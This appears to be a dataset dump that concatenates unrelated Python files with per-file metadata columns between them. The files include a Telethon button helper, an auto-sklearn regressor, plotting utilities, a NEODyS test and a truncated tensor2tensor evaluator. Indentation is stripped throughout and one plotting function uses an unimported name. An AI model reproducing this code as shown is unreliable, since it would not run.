<telethon.tl.custom.messagebutton.MessageButton>`,
so you might want to refer to that class instead.
Helper class to allow defining ``reply_markup`` when
sending a message with inline or keyboard buttons.
You should make use of the defined class methods to create button
instances instead making them yourself (i.e. don't do ``Button(...)``
but instead use methods line `Button.inline(...) <inline>` etc.
You can use `inline`, `switch_inline`, `url` and `auth`
together to create inline buttons (under the message).
You can use `text`, `request_location`, `request_phone` and `request_poll`
together to create a reply markup (replaces the user keyboard).
You can also configure the aspect of the reply with these.
The latest message with a reply markup will be the one shown to the user
(messages contain the buttons, not the chat itself).
You **cannot** mix the two type of buttons together,
and it will error if you try to do so.
The text for all buttons may be at most 142 characters.
If more characters are given, Telegram will cut the text
to 128 characters and add the ellipsis (…) character as
the 129.
"""
def __init__(self, button, *, resize, single_use, selective):
self.button = button
self.resize = resize
self.single_use = single_use
self.selective = selective
@staticmethod
def _is_inline(button):
"""
Returns `True` if the button belongs to an inline keyboard.
"""
return isinstance(button, (
types.KeyboardButtonCallback,
types.KeyboardButtonSwitchInline,
types.KeyboardButtonUrl,
types.InputKeyboardButtonUrlAuth
))
@staticmethod
def inline(text, data=None):
"""
Creates a new inline button with some payload data in it.
If `data` is omitted, the given `text` will be used as `data`.
In any case `data` should be either `bytes` or `str`.
Note that the given `data` must be less or equal to 64 bytes.
If more than 64 bytes are passed as data, ``ValueError`` is raised.
If you need to store more than 64 bytes, consider saving the real
data in a database and a reference to that data inside the button.
When the user clicks this button, `events.CallbackQuery
<telethon.events.callbackquery.CallbackQuery>` will trigger with the
same data that the button contained, so that you can determine which
button was pressed.
"""
if not data:
data = text.encode('utf-8')
elif not isinstance(data, (bytes, bytearray, memoryview)):
data = str(data).encode('utf-8')
if len(data) > 64:
raise ValueError('Too many bytes for the data')
return types.KeyboardButtonCallback(text, data)
@staticmethod
def switch_inline(text, query='', same_peer=False):
"""
Creates a new inline button to switch to inline query.
If `query` is given, it will be the default text to be used
when making the inline query.
If ``same_peer is True`` the inline query will directly be
set under the currently opened chat. Otherwise, the user will
have to select a different dialog to make the query.
When the user clicks this button, after a chat is selected, their
input field will be filled with the username of your bot followed
by the query text, ready to make inline queries.
"""
return types.KeyboardButtonSwitchInline(text, query, same_peer)
@staticmethod
def url(text, url=None):
"""
Creates a new inline button to open the desired URL on click.
If no `url` is given, the `text` will be used as said URL instead.
You cannot detect that the user clicked this button directly.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to open the displayed URL unless
the domain is trusted, and once confirmed the URL will open in their
device.
"""
return types.KeyboardButtonUrl(text, url or text)
@staticmethod
def auth(text, url=None, *, bot=None, write_access=False, fwd_text=None):
"""
Creates a new inline button to authorize the user at the given URL.
You should set the `url` to be on the same domain as the one configured
for the desired `bot` via `@BotFather <https://t.me/BotFather>`_ using
the ``/setdomain`` command.
For more information about letting the user login via Telegram to
a certain domain, see https://core.telegram.org/widgets/login.
If no `url` is specified, it will default to `text`.
Args:
bot (`hints.EntityLike`):
The bot that requires this authorization. By default, this
is the bot that is currently logged in (itself), although
you may pass a different input peer.
.. note::
For now, you cannot use ID or username for this argument.
If you want to use a different bot than the one currently
logged in, you must manually use `client.get_input_entity()
<telethon.client.users.UserMethods.get_input_entity>`.
write_access (`bool`):
Whether write access is required or not.
This is `False` by default (read-only access).
fwd_text (`str`):
The new text to show in the button if the message is
forwarded. By default, the button text will be the same.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to login to the specified domain.
"""
return types.InputKeyboardButtonUrlAuth(
text=text,
url=url or text,
bot=utils.get_input_user(bot or types.InputUserSelf()),
request_write_access=write_access,
fwd_text=fwd_text
)
@classmethod
def text(cls, text, *, resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button with the given text.
Args:
resize (`bool`):
If present, the entire keyboard will be reconfigured to
be resized and be smaller if there are not many buttons.
single_use (`bool`):
If present, the entire keyboard will be reconfigured to
be usable only once before it hides itself.
selective (`bool`):
If present, the entire keyboard will be reconfigured to
be "selective". The keyboard will be shown only to specific
users. It will target users that are @mentioned in the text
of the message or to the sender of the message you reply to.
When the user clicks this button, a text message with the same text
as the button will be sent, and can be handled with `events.NewMessage
<telethon.events.newmessage.NewMessage>`. You cannot distinguish
between a button press and the user typing and sending exactly the
same text on their own.
"""
return cls(types.KeyboardButton(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_location(cls, text, *,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user's location on click.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to share their location with the
bot, and if confirmed a message with geo media will be sent.
"""
return cls(types.KeyboardButtonRequestGeoLocation(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_phone(cls, text, *,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user's phone on click.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to share their phone with the
bot, and if confirmed a message with contact media will be sent.
"""
return cls(types.KeyboardButtonRequestPhone(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_poll(cls, text, *, force_quiz=False,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user to create a poll.
If `force_quiz` is `False`, the user will be allowed to choose whether
they want their poll to be a quiz or not. Otherwise, the user will be
forced to create a quiz when creating the poll.
If a poll is a quiz, there will be only one answer that is valid, and
the votes cannot be retracted. Otherwise, users can vote and retract
the vote, and the pol might be multiple choice.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a screen letting the user create a
poll will be shown, and if they do create one, the poll will be sent.
"""
return cls(types.KeyboardButtonRequestPoll(text, quiz=force_quiz),
resize=resize, single_use=single_use, selective=selective)
@staticmethod
def clear():
"""
Clears all keyboard buttons after sending a message with this markup.
When used, no other button should be present or it will be ignored.
"""
return types.ReplyKeyboardHide()
@staticmethod
def force_reply():
"""
Forces a reply to the message with this markup. If used,
no other button should be present or it will be ignored.
"""
return types.ReplyKeyboardForceReply()
| 40.916031
| 79
| 0.638619
| 1,441
| 10,720
| 4.713393
| 0.229702
| 0.025766
| 0.017668
| 0.020024
| 0.262073
| 0.257362
| 0.238221
| 0.21702
| 0.209953
| 0.199352
| 0
| 0.002515
| 0.295149
| 10,720
| 261
| 80
| 41.072797
| 0.895977
| 0.641511
| 0
| 0.276923
| 0
| 0
| 0.013186
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.184615
| false
| 0
| 0.030769
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
134fdc98faac6c7e555a1d8a47d4c15e48a09ce5
| 1,575
|
py
|
Python
|
src/main/resources/pys/join.py
|
addUsername/javaBoring
|
d576adbd21447085f56719e8cc871faf94d8a369
|
[
"MIT"
] | null | null | null |
src/main/resources/pys/join.py
|
addUsername/javaBoring
|
d576adbd21447085f56719e8cc871faf94d8a369
|
[
"MIT"
] | null | null | null |
src/main/resources/pys/join.py
|
addUsername/javaBoring
|
d576adbd21447085f56719e8cc871faf94d8a369
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 7 20:14:22 2020
Simple script to join json files
@author: SERGI
"""
import json
import sys
import os
def readJson(path):
with open(path, "r") as file:
return json.load(file)
def writeJson(path, dicc):
with open(path, "w") as file:
json.dump(dicc, file)
if __name__ == "__main__":
print("hello from python", flush=True)
jsonPath = str(sys.argv[1])
# =============================================================================
# jsonPath = "../eclipse-workspace/prueba/target/json/"
# =============================================================================
jsonPathTemp = jsonPath+"temp/"
arr = os.listdir(jsonPathTemp)
arr.sort()
print(arr)
dict_to_json = {}
dict_0 = readJson(jsonPathTemp + arr[0])
dict_1 = readJson(jsonPathTemp + arr[1])
dict_2 = readJson(jsonPathTemp + arr[2])
dict_3 = readJson(jsonPathTemp + arr[3])
keys = [name for name in dict_0.keys() if "0" not in name]
for key in keys:
dict_to_json[key] = dict_0[key] + dict_1[key] + dict_2[key] + dict_3[key]
#0seg,f_step,f_stop
seg = dict_0['0seg,f_step,f_stop'][0]
step = dict_0['0seg,f_step,f_stop'][1]
stop = dict_3['0seg,f_step,f_stop'][2]
dict_to_json['0seg,f_step,f_stop'] = [seg, step, stop]
print("Escribiendo json: ", jsonPath+arr[0], flush=True)
writeJson(jsonPath+arr[0], dict_to_json)
print("finish", flush=True)
| 28.125
| 82
| 0.533333
| 206
| 1,575
| 3.893204
| 0.364078
| 0.093516
| 0.05611
| 0.062344
| 0.107232
| 0.089776
| 0.047382
| 0
| 0
| 0
| 0
| 0.033389
| 0.239365
| 1,575
| 56
| 83
| 28.125
| 0.63606
| 0.215873
| 0
| 0
| 0
| 0
| 0.110351
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.096774
| 0
| 0.193548
| 0.129032
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13513f9e059c5209134cdb28c07c7e40eb9e7c97
| 8,756
|
py
|
Python
|
autosk_dev_test/component/LinReg.py
|
hmendozap/master-arbeit-files
|
5c1b90bc4a424313234b84bad405799de6f8d2ed
|
[
"MIT"
] | 2
|
2018-01-18T06:25:21.000Z
|
2018-12-11T07:43:09.000Z
|
autosk_dev_test/component/LinReg.py
|
hmendozap/master-arbeit-files
|
5c1b90bc4a424313234b84bad405799de6f8d2ed
|
[
"MIT"
] | 1
|
2016-03-29T07:55:18.000Z
|
2016-03-29T07:55:18.000Z
|
autosk_dev_test/component/LinReg.py
|
hmendozap/master-arbeit-files
|
5c1b90bc4a424313234b84bad405799de6f8d2ed
|
[
"MIT"
] | null | null | null |
import numpy as np
import scipy.sparse as sp
from HPOlibConfigSpace.configuration_space import ConfigurationSpace
from HPOlibConfigSpace.conditions import EqualsCondition, InCondition
from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, \
UniformIntegerHyperparameter, CategoricalHyperparameter, Constant
from autosklearn.pipeline.components.base import AutoSklearnRegressionAlgorithm
from autosklearn.pipeline.constants import *
class LinReg(AutoSklearnRegressionAlgorithm):
def __init__(self, number_updates, batch_size, dropout_output,
learning_rate, solver, lambda2,
momentum=0.99, beta1=0.9, beta2=0.9, rho=0.95,
lr_policy='fixed', gamma=0.01, power=1.0, epoch_step=2,
random_state=None):
self.number_updates = number_updates
self.batch_size = batch_size
self.dropout_output = dropout_output
self.learning_rate = learning_rate
self.lr_policy = lr_policy
self.lambda2 = lambda2
self.momentum = momentum
self.beta1 = 1-beta1 if beta1 is not None else 0.9
self.beta2 = 1-beta2 if beta2 is not None else 0.99
self.rho = rho
self.solver = solver
self.gamma = gamma
self.power = power
self.epoch_step = epoch_step
# Empty features and shape
self.n_features = None
self.input_shape = None
self.m_issparse = False
self.m_isregression = True
self.m_isbinary = False
self.m_ismultilabel = False
self.estimator = None
def _prefit(self, X, y):
self.batch_size = int(self.batch_size)
self.n_features = X.shape[1]
self.input_shape = (self.batch_size, self.n_features)
self.num_output_units = 1 # Regression
# Normalize the output
self.mean_y = np.mean(y)
self.std_y = np.std(y)
y = (y - self.mean_y) / self.std_y
if len(y.shape) == 1:
y = y[:, np.newaxis]
self.m_issparse = sp.issparse(X)
return X, y
def fit(self, X, y):
Xf, yf = self._prefit(X, y)
epoch = (self.number_updates * self.batch_size)//X.shape[0]
number_epochs = min(max(2, epoch), 110) # Cap the max number of possible epochs
from implementation import LogisticRegression
self.estimator = LogisticRegression.LogisticRegression(batch_size=self.batch_size,
input_shape=self.input_shape,
num_output_units=self.num_output_units,
dropout_output=self.dropout_output,
learning_rate=self.learning_rate,
lr_policy=self.lr_policy,
lambda2=self.lambda2,
momentum=self.momentum,
beta1=self.beta1,
beta2=self.beta2,
rho=self.rho,
solver=self.solver,
num_epochs=number_epochs,
gamma=self.gamma,
power=self.power,
epoch_step=self.epoch_step,
is_sparse=self.m_issparse,
is_binary=self.m_isbinary,
is_multilabel=self.m_ismultilabel,
is_regression=self.m_isregression)
self.estimator.fit(Xf, yf)
return self
def predict(self, X):
if self.estimator is None:
raise NotImplementedError
preds = self.estimator.predict(X, self.m_issparse)
return preds * self.std_y + self.mean_y
def predict_proba(self, X):
if self.estimator is None:
raise NotImplementedError()
return self.estimator.predict_proba(X, self.m_issparse)
@staticmethod
def get_properties(dataset_properties=None):
return {'shortname': 'lin_reg',
'name': 'Linear Regression',
'handles_regression': True,
'handles_classification': False,
'handles_multiclass': False,
'handles_multilabel': False,
'is_deterministic': True,
'input': (DENSE, SPARSE, UNSIGNED_DATA),
'output': (PREDICTIONS,)}
@staticmethod
def get_hyperparameter_search_space(dataset_properties=None):
policy_choices = ['fixed', 'inv', 'exp', 'step']
batch_size = UniformIntegerHyperparameter("batch_size",
100, 3000,
log=True,
default=150)
number_updates = UniformIntegerHyperparameter("number_updates",
500, 10500,
log=True,
default=500)
dropout_output = UniformFloatHyperparameter("dropout_output", 0.0, 0.99,
default=0.5)
lr = UniformFloatHyperparameter("learning_rate", 1e-6, 0.1,
log=True,
default=0.01)
l2 = UniformFloatHyperparameter("lambda2", 1e-6, 1e-2,
log=True,
default=1e-3)
solver = CategoricalHyperparameter(name="solver",
choices=["sgd", "adam"],
default="sgd")
beta1 = UniformFloatHyperparameter("beta1", 1e-4, 0.1,
log=True,
default=0.1)
beta2 = UniformFloatHyperparameter("beta2", 1e-4, 0.1,
log=True,
default=0.01)
lr_policy = CategoricalHyperparameter(name="lr_policy",
choices=policy_choices,
default='fixed')
gamma = UniformFloatHyperparameter(name="gamma",
lower=1e-3, upper=1e-1,
default=1e-2)
power = UniformFloatHyperparameter("power",
0.0, 1.0,
default=0.5)
epoch_step = UniformIntegerHyperparameter("epoch_step",
2, 20,
default=5)
cs = ConfigurationSpace()
cs.add_hyperparameter(number_updates)
cs.add_hyperparameter(batch_size)
cs.add_hyperparameter(dropout_output)
cs.add_hyperparameter(lr)
cs.add_hyperparameter(l2)
cs.add_hyperparameter(solver)
cs.add_hyperparameter(beta1)
cs.add_hyperparameter(beta2)
cs.add_hyperparameter(lr_policy)
cs.add_hyperparameter(gamma)
cs.add_hyperparameter(power)
cs.add_hyperparameter(epoch_step)
beta1_depends_on_solver = EqualsCondition(beta1, solver, "adam")
beta2_depends_on_solver = EqualsCondition(beta2, solver, "adam")
gamma_depends_on_policy = InCondition(child=gamma, parent=lr_policy,
values=['inv', 'exp', 'step'])
power_depends_on_policy = EqualsCondition(power, lr_policy, 'inv')
epoch_step_depends_on_policy = EqualsCondition(epoch_step,
lr_policy, 'step')
cs.add_condition(beta1_depends_on_solver)
cs.add_condition(beta2_depends_on_solver)
cs.add_condition(gamma_depends_on_policy)
cs.add_condition(power_depends_on_policy)
cs.add_condition(epoch_step_depends_on_policy)
return cs
| 44.222222
| 102
| 0.489721
| 773
| 8,756
| 5.335058
| 0.208279
| 0.020611
| 0.055286
| 0.006547
| 0.117119
| 0.079777
| 0.03904
| 0.033948
| 0.024248
| 0
| 0
| 0.027104
| 0.439584
| 8,756
| 197
| 103
| 44.446701
| 0.813328
| 0.010736
| 0
| 0.0875
| 0
| 0
| 0.035001
| 0.002541
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04375
| false
| 0
| 0.05
| 0.00625
| 0.1375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13532d8edfc3e8c0a315f5cb2ba2e9ad01f479b5
| 2,427
|
py
|
Python
|
DigiPsych_API/Data_Science_API/evaluate_model.py
|
larryzhang95/Voice-Analysis-Pipeline
|
264ac5c70d0baab47b81718ea5b895be30a683e9
|
[
"Apache-2.0"
] | 7
|
2019-06-22T21:03:50.000Z
|
2021-11-21T19:46:55.000Z
|
DigiPsych_API/Data_Science_API/evaluate_model.py
|
larryzhang95/Voice-Analysis-Pipeline
|
264ac5c70d0baab47b81718ea5b895be30a683e9
|
[
"Apache-2.0"
] | null | null | null |
DigiPsych_API/Data_Science_API/evaluate_model.py
|
larryzhang95/Voice-Analysis-Pipeline
|
264ac5c70d0baab47b81718ea5b895be30a683e9
|
[
"Apache-2.0"
] | 3
|
2019-09-15T01:50:39.000Z
|
2021-12-22T02:36:36.000Z
|
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.model_selection import learning_curve
# Plot learning curve
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid(True)
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Validation score")
plt.legend(loc="best")
plt.show()
return plt
# Plot validation curve
def plot_validation_curve(estimator, title, X, y, param_name, param_range, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
train_scores, test_scores = validation_curve(estimator, X, y, param_name, param_range, cv)
train_mean = np.mean(train_scores, axis=1)
train_std = np.std(train_scores, axis=1)
test_mean = np.mean(test_scores, axis=1)
test_std = np.std(test_scores, axis=1)
plt.plot(param_range, train_mean, color='r', marker='o', markersize=5, label='Training score')
plt.fill_between(param_range, train_mean + train_std, train_mean - train_std, alpha=0.15, color='r')
plt.plot(param_range, test_mean, color='g', linestyle='--', marker='s', markersize=5, label='Validation score')
plt.fill_between(param_range, test_mean + test_std, test_mean - test_std, alpha=0.15, color='g')
plt.grid(True)
plt.xscale('log')
plt.legend(loc='best')
plt.xlabel('Parameter')
plt.ylabel('Score')
plt.ylim(ylim)
| 42.578947
| 115
| 0.674083
| 370
| 2,427
| 4.186486
| 0.202703
| 0.092318
| 0.056811
| 0.054229
| 0.511298
| 0.356359
| 0.204003
| 0.204003
| 0.056811
| 0.056811
| 0
| 0.015432
| 0.199011
| 2,427
| 56
| 116
| 43.339286
| 0.781379
| 0.016893
| 0
| 0.081633
| 0
| 0
| 0.051616
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0
| 0.102041
| 0
| 0.163265
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13570cde1e5c8c95a0a1cd4eb53d4d9f0d94d653
| 297
|
py
|
Python
|
21-08/Starters8/1.py
|
allenalvin333/Codechef_Competitions
|
44c3626de33cd9e17d1acfc74abe0aab809efbad
|
[
"MIT"
] | null | null | null |
21-08/Starters8/1.py
|
allenalvin333/Codechef_Competitions
|
44c3626de33cd9e17d1acfc74abe0aab809efbad
|
[
"MIT"
] | null | null | null |
21-08/Starters8/1.py
|
allenalvin333/Codechef_Competitions
|
44c3626de33cd9e17d1acfc74abe0aab809efbad
|
[
"MIT"
] | null | null | null |
# https://www.codechef.com/START8C/problems/PENALTY
for T in range(int(input())):
n=list(map(int,input().split()))
a=b=0
for i in range(len(n)):
if(n[i]==1):
if(i%2==0): a+=1
else: b+=1
if(a>b): print(1)
elif(b>a): print(2)
else: print(0)
| 24.75
| 51
| 0.501684
| 54
| 297
| 2.759259
| 0.518519
| 0.09396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046296
| 0.272727
| 297
| 12
| 52
| 24.75
| 0.643519
| 0.164983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.3
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13583e5f15c53f390db50be7afda1b1e9f5ec33e
| 859
|
py
|
Python
|
util/eval.py
|
jhong93/vpd
|
1ed3e8631c46e078ecb9a7756dba1f1c14aead5b
|
[
"BSD-3-Clause"
] | 7
|
2021-11-26T01:15:23.000Z
|
2022-03-15T10:51:47.000Z
|
util/eval.py
|
jhong93/vpd
|
1ed3e8631c46e078ecb9a7756dba1f1c14aead5b
|
[
"BSD-3-Clause"
] | 4
|
2022-01-15T09:46:00.000Z
|
2022-02-05T07:10:18.000Z
|
util/eval.py
|
jhong93/vpd
|
1ed3e8631c46e078ecb9a7756dba1f1c14aead5b
|
[
"BSD-3-Clause"
] | 1
|
2021-09-18T16:50:14.000Z
|
2021-09-18T16:50:14.000Z
|
import matplotlib.pyplot as plt
from sklearn.metrics import ConfusionMatrixDisplay, confusion_matrix
def save_confusion_matrix(truth, pred, out_file, norm=None):
label_names = list(set(truth) | set(pred))
label_names.sort()
truth_compact = [label_names.index(x) for x in truth]
pred_compact = [label_names.index(x) for x in pred]
cm = confusion_matrix(
truth_compact, pred_compact, labels=list(range(len(label_names))),
normalize=norm)
if norm is not None:
cm *= 100
fig = plt.figure(figsize=(20, 20))
ax = fig.add_subplot(111)
disp = ConfusionMatrixDisplay(
confusion_matrix=cm, display_labels=label_names)
disp.plot(ax=ax, xticks_rotation='vertical',
values_format='.1f' if norm is not None else 'd')
plt.tight_layout()
plt.savefig(out_file)
plt.close(fig)
| 35.791667
| 74
| 0.690338
| 121
| 859
| 4.719008
| 0.504132
| 0.105079
| 0.129597
| 0.077058
| 0.154116
| 0.101576
| 0.101576
| 0.101576
| 0
| 0
| 0
| 0.016058
| 0.202561
| 859
| 23
| 75
| 37.347826
| 0.817518
| 0
| 0
| 0
| 0
| 0
| 0.01397
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.095238
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
135933f07f224fa858e30bebe4b7db897823355d
| 995
|
py
|
Python
|
astroquery/neodys/tests/test_neodys_remote.py
|
B612-Asteroid-Institute/astroquery
|
4bc8002639e80f7356306f4e000334da5e086091
|
[
"BSD-3-Clause"
] | null | null | null |
astroquery/neodys/tests/test_neodys_remote.py
|
B612-Asteroid-Institute/astroquery
|
4bc8002639e80f7356306f4e000334da5e086091
|
[
"BSD-3-Clause"
] | 1
|
2021-03-19T14:06:50.000Z
|
2021-03-19T14:06:50.000Z
|
astroquery/neodys/tests/test_neodys_remote.py
|
B612-Asteroid-Institute/astroquery
|
4bc8002639e80f7356306f4e000334da5e086091
|
[
"BSD-3-Clause"
] | null | null | null |
from ... import neodys
def test_neodys_query():
test_object = "2018VP1"
res_kep_0 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="ke", epoch_near_present=0)
res_kep_1 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="ke", epoch_near_present=1)
res_eq_0 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="eq", epoch_near_present=0)
res_eq_1 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="eq", epoch_near_present=1)
assert len(res_kep_0['Keplerian State Vector']) == 6
assert len(res_kep_0['Covariance Matrix']) == 21
assert res_kep_0['Mean Julian Date'][0] != res_kep_1['Mean Julian Date'][0]
assert len(res_eq_0['Equinoctial State Vector']) == 6
assert len(res_eq_0['Covariance Matrix']) == 21
assert len(res_eq_0['Keplerian Correlation Matrix']) == 0
assert res_eq_0['Mean Julian Date'][0] != res_eq_1['Mean Julian Date'][0]
| 41.458333
| 79
| 0.711558
| 155
| 995
| 4.225806
| 0.225806
| 0.053435
| 0.045802
| 0.128244
| 0.789313
| 0.583206
| 0.451908
| 0.451908
| 0.451908
| 0.451908
| 0
| 0.039616
| 0.162814
| 995
| 23
| 80
| 43.26087
| 0.746699
| 0
| 0
| 0
| 0
| 0
| 0.188129
| 0
| 0
| 0
| 0
| 0
| 0.388889
| 1
| 0.055556
| false
| 0
| 0.055556
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1359c0fa6a8b2dda6889c4d23c5bb6bc6ad1f0c0
| 9,806
|
py
|
Python
|
tensor2tensor/rl/evaluator.py
|
SouBanerjee/tensor2tensor
|
8b88b13dd65bf52b3c27663a128adb7b0a5773fb
|
[
"Apache-2.0"
] | 1
|
2019-12-11T14:43:49.000Z
|
2019-12-11T14:43:49.000Z
|
tensor2tensor/rl/evaluator.py
|
SouBanerjee/tensor2tensor
|
8b88b13dd65bf52b3c27663a128adb7b0a5773fb
|
[
"Apache-2.0"
] | null | null | null |
tensor2tensor/rl/evaluator.py
|
SouBanerjee/tensor2tensor
|
8b88b13dd65bf52b3c27663a128adb7b0a5773fb
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Evaluation script for RL agents.
Example invocation:
python -m tensor2tensor.rl.evaluator \
--policy_dir=$HOME/t2t/rl_v1/policy \
--eval_metrics_dir=$HOME/t2t/rl_v1/full_eval_metrics \
--hparams_set=rlmb_base \
--hparams='batch_size=64'
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
from tensor2tensor.data_generators import gym_env
from tensor2tensor.layers import common_video
from tensor2tensor.models.research import rl # pylint: disable=unused-import
from tensor2tensor.rl import rl_utils
from tensor2tensor.rl import trainer_model_based_params # pylint: disable=unused-import
from tensor2tensor.utils import flags as t2t_flags # pylint: disable=unused-import
from tensor2tensor.utils import registry
from tensor2tensor.utils import trainer_lib
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_string("output_dir", "", "Main directory for multi-runs.")
flags.DEFINE_integer("total_num_workers", 1, "How many workers in total.")
flags.DEFINE_string("worker_to_game_map", "", "How to map workers to games.")
flags.DEFINE_string("policy_dir", "", "Directory with policy checkpoints.")
flags.DEFINE_string("model_dir", "", "Directory with model checkpoints.")
flags.DEFINE_string(
"eval_metrics_dir", "", "Directory to output the eval metrics at."
)
flags.DEFINE_bool("full_eval", True, "Whether to ignore the timestep limit.")
flags.DEFINE_enum(
"agent", "policy", ["random", "policy", "planner"], "Agent type to use."
)
flags.DEFINE_bool(
"eval_with_learner", True,
"Whether to use the PolicyLearner.evaluate function instead of an "
"out-of-graph one. Works only with --agent=policy."
)
flags.DEFINE_string(
"planner_hparams_set", "planner_small", "Planner hparam set."
)
flags.DEFINE_string("planner_hparams", "", "Planner hparam overrides.")
flags.DEFINE_integer(
"log_every_steps", 20, "Log every how many environment steps."
)
flags.DEFINE_string(
"debug_video_path", "", "Path to save the planner debug video at."
)
# Unused flags needed to pass for multi-run infrastructure.
flags.DEFINE_bool("autotune", False, "Unused here.")
flags.DEFINE_string("objective", "", "Unused here.")
flags.DEFINE_string("client_handle", "client_0", "Unused.")
flags.DEFINE_bool("maximize_tuner_objective", True, "Unused.")
flags.DEFINE_integer("vizier_search_algorithm", 0, "Unused.")
@registry.register_hparams
def planner_tiny():
return tf.contrib.training.HParams(
num_rollouts=1,
planning_horizon=2,
rollout_agent_type="random",
batch_size=1,
env_type="simulated",
)
@registry.register_hparams
def planner_small():
return tf.contrib.training.HParams(
num_rollouts=64,
planning_horizon=16,
rollout_agent_type="policy",
batch_size=64,
env_type="simulated",
)
def make_env(env_type, real_env, sim_env_kwargs):
"""Factory function for envs."""
return {
"real": lambda: real_env.new_like( # pylint: disable=g-long-lambda
